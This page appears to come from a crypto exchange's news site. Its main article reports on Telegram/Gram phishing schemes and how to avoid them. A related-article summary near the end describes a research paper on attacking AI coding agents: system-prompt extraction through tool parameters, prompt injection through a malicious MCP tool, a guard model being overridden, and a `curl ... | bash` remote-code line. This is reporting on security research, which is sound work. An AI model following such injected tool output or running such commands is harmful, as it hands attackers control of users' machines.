Gram Doubts: Scammers Develop Scheme with New Service in Telegram

cryptonews.ruXuất bản vào 2026-08-07Cập nhật gần nhất vào 2026-08-07

Tóm tắt

Cybercriminals are exploiting news surrounding Telegram and its founder Pavel Durov to launch new phishing schemes targeting the Gram cryptocurrency. They create fake websites and Telegram bots, designed to mimic official platforms, to pressure users. Common tactics include urging people to urgently exchange old tokens, withdraw funds ahead of an alleged platform block, or receive free crypto through special services. Experts note a sharp rise in suspicious domain registrations mentioning Telegram, Durov, or Gram, with phishing domains doubling recently. The scams rely not on hacking technology, but on psychological manipulation—leveraging fear of loss, promises of easy profits, and a false sense of urgency. The fraudsters build complex "ecosystems of false trust," guiding victims from search results to channels, bots, and ultimately fake sites to steal seed phrases or authorize transactions. Officials warn that Telegram does not distribute cryptocurrency or conduct token conversions via third-party sites. The primary defense remains user caution: avoid clicking promotional links, never enter seed phrases on external sites, and use only official Telegram services for crypto wallets.

Scammers have begun actively using news surrounding Telegram and Pavel Durov (included in the list of terrorists and extremists in Russia) to spread new phishing schemes related to the Gram cryptocurrency. Users are offered to urgently exchange old tokens, withdraw funds before the alleged upcoming messenger block, or receive free cryptocurrency through special services. According to experts, criminals create fake websites and Telegram bots, designed in the platform's official style. The main tools of influence are the fear of losing funds and promises of easy earnings.

Fake Telegram Services

Following the emergence of news surrounding Telegram, cybersecurity specialists recorded a sharp increase in suspicious activity. According to them, malicious actors began mass-registering domains mentioning Telegram, Pavel Durov, and the Gram cryptocurrency — the native token of the TON blockchain — as well as launching fake services promising users to preserve access to their assets or quickly earn money on the new "coin".

— After July 30th, SBA analysts have recorded increased registration activity around Telegram. Over six days, the number of new domains mentioning Telegram or Durov grew by approximately 18%. At the same time, the number of domains with potential signs of phishing doubled. The batch registration of 11 similar domains at once on August 3rd, masquerading as Telegram verification and protection services, is particularly noticeable, — Sergey Trukhachev, head of the Smart Business Alert service at ESA PRO, told Izvestia.

According to him, scammers actively exploit user concerns related to Telegram's future. People are convinced that services affiliated with the messenger's founder will supposedly soon become unavailable, so it is necessary to transfer funds or use a new crypto service as quickly as possible.

Criminals practically immediately began using the news hook to create new storylines, noted Pavel Kovalenko, director of the fraud counteraction center at Informzashchita. According to him, the launch of the built-in non-custodial Gram wallet opened additional opportunities for malicious actors. Users have not yet had time to understand the new function, which scammers actively exploit by passing off fake services as official Telegram tools.

A similar assessment was given by Fedor Chunizhekov, head of the research group at Positive Technologies. He noted that high-profile events traditionally become the basis for new social engineering scenarios.

— The user is told that it is necessary to "urgently confirm the account," "withdraw assets before the block," "exchange old coins," "get free tokens," or "register in the new service before others." Precisely the feeling of urgency, the promise of free benefit, and the exclusivity of the offer become the main tools of manipulation and psychological pressure, — he explained.

Systemic Approaches of Scammers

The main task of scammers is to convince a person to voluntarily provide access to their crypto wallet. After clicking the link, the user is asked to authorize via Telegram, enter a seed phrase, or confirm a transaction, after which the assets are irrevocably transferred to the criminals, Pavel Kovalenko explained.

In essence, criminals bet not on hacking technologies, but on psychological pressure, added Igor Bederov, chairman of the Council on Countering Technological Offenses of the NSB KS of Russia, founder of Internet-Rozysk.

Scammers don't hack complex blockchain protocols; they hack gullibility and the craving for 'freebies' against the backdrop of panic headlines. Moreover, the number of registrations for phishing domains with words like gram, wallet, convert, and gift in conjunction with Telegram has increased dozens of times, — the expert emphasized.

At the same time, fraudulent campaigns are becoming increasingly complex. Today, malicious actors build entire trust chains, sequentially moving the user from search results to a Telegram channel, then to a bot, and onto a fake website, said Mikhail Shurygin, chairman of the ROCIT commission on cloud technologies, hosting, and information security.

— We can speak of a transition from primitive distribution of malicious links to creating entire "ecosystems of false trust," — he noted.

Quality design, the presence of reviews, support services, and even a secure connection are no longer considered signs of a resource's reliability. It is important for users to remember that Telegram and its official services do not conduct cryptocurrency giveaways or token conversions through third-party websites or bots, the expert reminded.

Malicious actors also actively use phishing pages and cryptodrainers — malicious programs that prompt users to independently connect crypto wallets to fake sites or enter Telegram login credentials under the pretext of receiving free tokens and other bonuses, added Maria Sinitsyna, senior analyst of the digital risk protection department at F6 company.

— The main vulnerability in 99% of such attacks lies at the intersection of technology and human psychology, — noted Igor Bederov.

The interviewed experts agree that the main protection for digital assets remains caution. They recommend not clicking on advertising links, not entering seed phrases and confirmation codes on third-party resources, and using only official Telegram services when working with crypto wallets.

end-content

Tiền kỹ thuật số thịnh hành

Câu hỏi Liên quan

QWhat is the main scam method that fraudsters are using around Telegram and the Gram cryptocurrency, according to the article?

AFraudsters are using phishing schemes, creating fake websites and Telegram bots that mimic the official platform's style. They exploit users' fears of losing funds or offer promises of easy profits, convincing people to urgently exchange old tokens, withdraw funds due to an alleged upcoming messenger block, or receive free cryptocurrency through special services.

QWhat specific increase in suspicious domain registration activity was reported following the news about Telegram?

AAnalysts from SBA reported that in the six days after July 30, the number of new domains mentioning Telegram or Durov grew by approximately 18%. The number of domains with potential signs of phishing doubled. There was a notable batch registration of 11 similar domains on August 3, masquerading as Telegram verification and protection services.

QWhat is the primary goal of the scammers when a user clicks their link?

AThe main goal is to convince the person to voluntarily provide access to their crypto wallet. Users are asked to authorize via Telegram, enter their seed phrase, or confirm a transaction, after which their assets are irreversibly transferred to the criminals.

QHow have fraudsters evolved their campaigns beyond simple malicious link distribution, as described in the article?

AThey have moved to building complex 'chains of trust' or entire 'ecosystems of false trust.' This involves guiding a user sequentially from search engine results to a Telegram channel, then to a bot, and finally to a fake website, making the scam appear more legitimate and sophisticated.

QWhat key advice do experts give for protecting digital assets from such scams?

AExperts advise users to be cautious: not to click on advertising links, not to enter seed phrases or confirmation codes on third-party resources, and to use only official Telegram services when working with crypto wallets. They emphasize that a quality design, positive reviews, or a secure connection are no longer reliable signs of a trustworthy resource.

Nội dung Liên quan

Kho dự trữ Bitcoin của Strategy thu lợi nhuận $1 tỷ nhờ giá Bitcoin tăng

Kho dự trữ bitcoin của công ty MicroStrategy do Michael Saylor đứng đầu đã thoát khỏi tình trạng lỗ nhờ đà tăng giá của tiền mã hóa. Lợi nhuận chưa thực hiện từ khoản đầu tư này đã vượt quá 1 tỷ USD. Vào ngày 21 tháng 8, giá Bitcoin ($BTC) lần đầu tiên tăng vọt trên 76.000 USD kể từ cuối tháng Năm, với mức tăng 21% trong tuần. Tính đến 10:45 giờ Moscow, Bitcoin được giao dịch quanh mức 76.700 USD. MicroStrategy sở hữu 840.447 BTC với giá mua trung bình là 75.385 USD. Từ năm 2020, công ty đã chi 63,36 tỷ USD để tích lũy số bitcoin này. Với giá hiện tại, tổng giá trị kho dự trữ đã đạt 64,46 tỷ USD, vượt quá chi phí đầu tư khoảng 1,1 tỷ USD. Sự thay đổi mạnh mẽ này diễn ra chưa đầy một tháng sau khi MicroStrategy báo cáo khoản lỗ 8,2 tỷ USD trong quý II, chủ yếu do tổn thất chưa thực hiện từ khoản đầu tư vào Bitcoin (khi đó giá vào khoảng 60.000 USD cuối tháng Sáu). Để duy trì ổn định tài chính, công ty đã phải bán một phần bitcoin và tăng cường dự trữ USD. Tuy nhiên, đầu tháng Tám, CEO Phong Le tuyên bố công ty sẽ tiếp tục tích lũy tiền mã hóa vào cuối năm nay.

cryptonews.ru9 phút trước

Kho dự trữ Bitcoin của Strategy thu lợi nhuận $1 tỷ nhờ giá Bitcoin tăng

cryptonews.ru9 phút trước

RWA Token hóa bước sang giai đoạn tiếp theo: Lợi thế thực sự cần thời gian để xây dựng là gì?

Khung phát hành token hóa tài sản thực (RWA) đang ngày càng trưởng thành, giúp việc đưa tài sản lên chuỗi trở nên nhanh chóng hơn. Tuy nhiên, khi rào cản về "phát hành" giảm xuống, câu hỏi quan trọng hơn là: điều gì sẽ xảy ra sau khi phát hành? Lợi thế cạnh tranh lâu dài không chỉ nằm ở loại tài sản được token hóa, mà còn ở khả năng vận hành bền vững và hồ sơ theo dõi được tích lũy theo thời gian. Bài viết nêu bật khái niệm "Lớp Dự trữ" (Reserve Layer) – cơ sở hạ tầng kết nối tài sản thực chất lượng cao với các hệ thống xác minh, thanh khoản và vận hành cần thiết trên chuỗi. Không phải mọi tài sản đều phù hợp làm tài sản dự trữ. Các tài sản như trái phiếu kho bạc Mỹ ngắn hạn, vàng vật chất có tính xác định giá trị cao, thị trường sâu và tiêu chuẩn hóa tốt. Ngược lại, các tài sản như tín dụng tư nhân phức tạp hơn do tính không đồng nhất. Lợi thế thực sự khó sao chép là hồ sơ vận hành lâu dài được xây dựng thông qua việc thực thi nhất quán: kiểm toán dự trữ độc lập định kỳ, cơ chế mua lại đã được chứng minh, duy trì tính liên tục thị trường, mở rộng tích hợp hệ sinh thái và xây dựng tính thanh khoản. Các bằng chứng này tích lũy theo thời gian, tạo niềm tin cho các tổ chức và củng cố vòng tròn tăng cường: hồ sơ vận hành mạnh hơn dẫn đến phân phối rộng hơn, thanh khoản sâu hơn và tiện ích tài sản thế chấp lớn hơn. Chất lượng tài sản cơ bản và năng lực vận hành của bên phát hành là hai trụ cột không thể thiếu cho sự bền vững. Sự kết hợp của tài sản dự trữ chất lượng cao với năng lực vận hành đã được chứng minh sẽ tạo nền tảng vững chắc nhất. Trong khi đó, ngay cả những tài sản chất lượng cao cũng có thể tiềm ẩn rủi ro nếu cơ sở hạ tầng vận hành phía sau chưa được kiểm chứng qua thời gian và các điều kiện thị trường khác nhau. Tóm lại, một thập kỷ sau, những dự án RWA vẫn giữ được niềm tin của thị trường và tiếp tục hoạt động sẽ là những người kết hợp thành công tài sản dự trữ chất lượng cao với kỷ luật vận hành lâu dài, biến chúng thành cơ sở hạ tầng đáng tin cậy cho tài chính trên chuỗi.

marsbit12 phút trước

RWA Token hóa bước sang giai đoạn tiếp theo: Lợi thế thực sự cần thời gian để xây dựng là gì?

marsbit12 phút trước

Artemis: Tại sao chúng tôi lạc quan về Circle?

**Artemis: Tại sao chúng tôi lạc quan về Circle?** Thị trường hiện đang định giá thấp Circle (CRCL) do lo ngại về Open Standard - một liên minh 140+ công ty (gồm Stripe, Visa, Mastercard, Google) phát hành stablecoin OUSD, đe dọa vị thế của USDC. Tuy nhiên, quan điểm của Artemis là thị trường đang nhầm lẫn. Ba luận điểm cốt lõi: 1. **Tăng trưởng ổn định:** Stablecoin dự kiến đạt quy mô **1 nghìn tỷ USD vào năm 2030** (tăng trưởng kép hàng năm ~40%), và đã tách biệt khỏi chu kỳ giá crypto. 2. **Hiệu ứng mạng và tính thanh khoản:** Thị trường có xu hướng "kẻ thắng hưởng tất". USDC và Tether hiện nắm hơn **80% thị phần**, xây dựng rào cản cực kỳ khó vượt qua về thanh khoản xuyên chuỗi và ứng dụng. Các liên minh như Open Standard khó thành công do thiếu động lực và quản trị đồng thuận. 3. **Định giá sai lầm:** Thị trường xem Circle chỉ là "nhà phát hành stablecoin" phụ thuộc vào lãi suất, trong khi thực chất họ đang xây dựng một **nền tảng tiền tệ toàn diện (full-stack money platform)** với các sản phẩm như Mạng Thanh toán Circle (Circle Payments Network - giao dịch tăng 6.8 lần/năm) và blockchain Arc. Khi Circle đa dạng hóa doanh thu từ phí giao dịch và blockchain, định giá (P/S) hiện tại ~6.7x được kỳ vọng mở rộng lên ~10x. Với kịch bản ổn định, doanh thu Circle có thể đạt ~5 tỷ USD vào năm 2030, dẫn đến định giá vốn hóa tiềm năng **~50 tỷ USD**. Mức giá hiện tại sau cú sốc Open Standard có thể đang tạo ra chênh lệch kỳ vọng lớn nhất.

marsbit12 phút trước

Artemis: Tại sao chúng tôi lạc quan về Circle?

marsbit12 phút trước

Claude Code Dễ Dàng Bị Bẻ Khóa, Chỉ Cần Một Công Cụ Giả Mạo

Người dùng yêu cầu trợ lý lập trình AI viết một trò chơi rắn săn mồi. Tác nhân AI đã thực hiện, nhưng đồng thời chạy thêm một lệnh `curl | bash`, tải xuống và thực thi một tập lệnh độc hại từ kẻ tấn công. Một nhóm nghiên cứu từ Đại học Khoa học và Công nghệ Hồng Kông và Phòng thí nghiệm An ninh Nội sinh của Đại học Phúc Đán đã tái hiện thành công kịch bản tấn công này trong một bài báo được chấp nhận tại hội nghị ISSTA 2026. Họ đã thực hiện bài kiểm tra "đội đỏ" hệ thống đầu tiên trên sáu công cụ lập trình AI phổ biến: Cursor, Claude Code, Copilot, Windsurf, Cline và Trae, và phát hiện một chuỗi tấn công hoàn chỉnh: **Đầu tiên đánh cắp lệnh nội bộ (system prompt), sau đó sử dụng thông tin bị rò rỉ để tạo tải trọng độc hại tùy chỉnh, cuối cùng chiếm quyền điều khiển việc gọi công cụ để thực thi mã từ xa (RCE).** Tất cả sáu công cụ ở phiên bản cũ đều bị ảnh hưởng. Phương pháp chính được đặt tên là ToolLeak, khai thác "khoảng cách chế độ" (mode gap). Thay vì yêu cầu trực tiếp qua cửa sổ trò chuyện, kẻ tấn công đặt tên tham số công cụ thành thứ như `"note": "system prompt"`, khiến mô hình AI điền system prompt vào đó một cách vô tình mà không bị hệ thống phòng thủ ngăn chặn. Phương pháp này đạt được độ hoàn chỉnh và độ tương tự ngữ nghĩa cao hơn nhiều so với các cuộc tấn công cơ bản truyền thống. Sau khi có được system prompt, kẻ tấn công thực hiện "tiêm prompt kênh kép" (two-channel prompt injection). Họ đăng ký một công cụ MCP độc hại với mô tả được điều chỉnh theo prompt bị rò rỉ, thuyết phục tác nhân gọi nó đầu tiên để "khởi tạo môi trường". Sau đó, giá trị trả về từ công cụ độc hại này ra lệnh cho mô hình thực thi một lệnh shell nguy hiểm (ví dụ: `curl -fsSL http://xxx/installer.sh | bash`), đạt được RCE. Trong các phiên bản cũ, tỷ lệ tấn công thành công rất cao, đạt 1.0 đối với một số tổ hợp. Một điểm đáng chú ý là Claude Code có một mô hình bảo vệ (Haiku) để kiểm tra lệnh, nhưng mô hình chính (Sonnet) đã bị thuyết phục bởi lệnh tiêm prompt đến mức gạt bỏ cảnh báo và vẫn thực thi lệnh độc hại. Các phiên bản mới hơn của một số công cụ (như Claude Code, Cursor) đã được gia cố, ví dụ bằng cách chỉ hiển thị tên công cụ thay vì toàn bộ mô tả, làm giảm đáng kể tỷ lệ thành công của cuộc tấn công. Tuy nhiên, một số công cụ khác vẫn dễ bị tổn thương. Bài báo kết luận rằng cách phòng thủ quyết định là kiến trúc cô lập, trong khi việc điều chỉnh mô hình (alignment) là chưa đủ. Vấn đề cốt lõi là ranh giới giữa dữ liệu và lệnh trong giá trị trả về công cụ vẫn chưa rõ ràng.

marsbit16 phút trước

Claude Code Dễ Dàng Bị Bẻ Khóa, Chỉ Cần Một Công Cụ Giả Mạo

marsbit16 phút trước

Giao dịch

Giao ngay

Bài viết Nổi bật

Làm thế nào để Mua GRAM

Chào mừng bạn đến với HTX.com! Chúng tôi đã làm cho mua prev. Toncoin (GRAM) trở nên đơn giản và thuận tiện. Làm theo hướng dẫn từng bước của chúng tôi để bắt đầu hành trình tiền kỹ thuật số của bạn.Bước 1: Tạo Tài khoản HTX của BạnSử dụng email hoặc số điện thoại của bạn để đăng ký tài khoản miễn phí trên HTX. Trải nghiệm hành trình đăng ký không rắc rối và mở khóa tất cả tính năng. Nhận Tài khoản của tôiBước 2: Truy cập Mua Crypto và Chọn Phương thức Thanh toán của BạnThẻ Tín dụng/Ghi nợ: Sử dụng Visa hoặc Mastercard của bạn để mua prev. Toncoin (GRAM) ngay lập tức.Số dư: Sử dụng tiền từ số dư tài khoản HTX của bạn để giao dịch liền mạch.Bên thứ ba: Chúng tôi đã thêm những phương thức thanh toán phổ biến như Google Pay và Apple Pay để nâng cao sự tiện lợi.P2P: Giao dịch trực tiếp với người dùng khác trên HTX.Thị trường mua bán phi tập trung (OTC): Chúng tôi cung cấp những dịch vụ được thiết kế riêng và tỷ giá hối đoái cạnh tranh cho nhà giao dịch.Bước 3: Lưu trữ prev. Toncoin (GRAM) của BạnSau khi mua prev. Toncoin (GRAM), lưu trữ trong tài khoản HTX của bạn. Ngoài ra, bạn có thể gửi đi nơi khác qua chuyển khoản blockchain hoặc sử dụng để giao dịch những tiền kỹ thuật số khác.Bước 4: Giao dịch prev. Toncoin (GRAM)Giao dịch prev. Toncoin (GRAM) dễ dàng trên thị trường giao ngay của HTX. Chỉ cần truy cập vào tài khoản của bạn, chọn cặp giao dịch, thực hiện giao dịch và theo dõi trong thời gian thực. Chúng tôi cung cấp trải nghiệm thân thiện với người dùng cho cả người mới bắt đầu và người giao dịch dày dạn kinh nghiệm.

Tổng lượt xem 607Xuất bản vào 2026.06.15Cập nhật vào 2026.08.20

Làm thế nào để Mua GRAM

Thảo luận

Chào mừng đến với Cộng đồng HTX. Tại đây, bạn có thể được thông báo về những phát triển nền tảng mới nhất và có quyền truy cập vào thông tin chuyên sâu về thị trường. Ý kiến ​​của người dùng về giá của GRAM (GRAM) được trình bày dưới đây.

活动图片